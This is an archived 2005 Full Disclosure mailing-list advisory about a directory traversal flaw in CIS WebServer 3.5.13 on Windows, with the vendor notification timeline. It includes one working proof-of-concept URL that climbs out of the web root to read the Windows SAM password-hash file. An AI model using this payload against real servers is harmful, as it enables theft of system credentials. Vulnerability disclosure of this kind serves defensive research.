Full Disclosure mailing list archives
CIS WebServer Directory Traversal Bug
From: "CorryL" <corryl () sitoverde com>
Date: Fri, 25 Feb 2005 18:33:54 +0100
-=[ x0n3-h4ck Italian Security Team ]=- /*Advisories*\ /* Application: CIS WebServer Vendor's Url: www.cisindia.net Version: 3.5.13 Platforms: Windows Bug: Directory Traversal Exploitation: Remote Author: CorryL corryl80 () gmail com www.x0n3-h4ck.org *\ {Description} CIS WebServer is an easy http server, A remote user can obtain files on the system that are located outside of the web document directory. {Bug} http://victimhost/../../../windows/repair/sam A remote user succeds to read the file sam of the system where CIS WebServer is running {Vendor Status} 20/02/2005 Vendor notification 21/02/2005 Vendor Response 25/02/2005 No patch relase from vendor 25/02/2005 Public disclousure {Fix} Waiting for an official patch CorryL corryl80 () gmail com www.x0n3-h4ck.org Italian Security Team _________________________________ www.seekstat.it is your web stat _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- CIS WebServer Directory Traversal Bug CorryL (Feb 25)